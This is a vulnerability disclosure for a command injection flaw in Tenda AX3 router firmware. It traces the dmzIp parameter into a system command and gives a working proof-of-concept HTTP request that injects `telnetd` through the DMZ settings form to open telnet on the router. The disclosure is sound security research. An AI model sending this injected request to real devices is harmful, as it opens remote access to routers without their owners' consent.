# Tenda Vulnerability

Vendor:Tenda

Product:AX3

Version:V16.03.12.10_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn



## Vulnerability description

We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `httpd` binary:

In `mDMZSetCfg` function, `dmzIp` is directly passed by the attacker, so we can control the `dmzIp` to attack the OS.

As you can see here, the input has not been checked. And then, call the function `SetValue` to store this input.

<div  align="center"><img src="./images/1.png" style="zoom:80%;" /></div>

In `netctrl` binary:

In `advance_get_dmz_cfg` function, the initial input will be extracted.

<div  align="center"><img src="./images/2.png" style="zoom:80%;" /></div>

Eventually, in `advance_set_dmz_cfg` function, the initial input will cause command injection.

<div  align="center"><img src="./images/3.png" style="zoom:80%;" /></div>

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.



## PoC

We set `dmzIp` as **`telnetd`** , and the router will excute it,such as:

```http
POST /goform/SetDMZCfg HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/dmz.html
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0iszcvb

dmzEn=1&dmzIp=`telnetd`
```

<div  align="center"><img src="./images/4.png" style="zoom:80%;" /></div>



## Result

The target router has enabled the telnet service.

<div  align="center"><img src="./images/5.png" style="zoom:80%;" />

